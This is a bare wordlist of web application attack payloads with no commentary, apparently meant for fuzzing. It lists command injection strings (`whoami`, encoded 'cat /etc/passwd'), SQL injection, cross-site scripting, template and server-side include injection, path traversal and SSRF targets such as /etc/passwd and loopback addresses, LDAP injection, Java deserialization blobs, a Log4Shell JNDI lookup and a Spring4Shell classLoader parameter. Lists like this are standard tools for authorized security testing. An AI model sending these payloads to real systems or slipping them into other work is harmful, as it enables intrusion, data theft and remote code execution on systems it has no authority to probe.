*
&
%
;
[
]
(
)
|
?
\
'
\
@
#
!
.
null
$null
`whoami`
uname%20-a
%3Bcat%20/etc/passwd
%3d
%25
&#37
%20
%0a
%0d%0atest
%E5%98%8A%E5%98%8D
%00
%u2215
%c2%a9
&quot;
&#34;
&#x22;
&pos;
&#39;
&#x27;
&amp;
&lt;
&gt;
n\nn
r\rr
s\\s           
1'
1' or '1' = '1
1' or '1' = '1')) LIMIT 1/*
10 AND 1=2"
<
%3c
%253c
«
+ADw-
>
%3e
%253e
»
+AD4-
test><script>alert(1);</script>
test" onfocus=alert(2) autofocus "
'test';alert(3);'';",
javascript:alert(4)
test{{7+7}}
<!--#exec cmd="/bin/ps ax"-->
}}<tag>"
http://127.0.0.1/
https://127.1/
ftp://0x7f000001/
smb://0000::1:445/
file:///etc/passwd
./../../../etc/passwd
zip:///filename_path
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
..\\
..//
....\\\\
c$:\\
0x7f
0x80
0xff
0x100
0x0
0xffffffff
-1
test}}{ 
foo<
foo'
foo<!--
&foo
]]>
foo</bar>"
*)(&
*)(|&
pwd)
*)(|(*
*))%00
admin)(&)
user=*)(uid=*))(|(uid=*
test&foo=
rO0ABX1////3
rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c="
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABBAAAAAc3EAfgAAP0AAAAAAAAx3CAAAABBAAAAAcHB4cHg=":
${jndi:ldap://"+ip+"/a}
${java:version}
class.module.classLoader.URLs%5B0%5D=0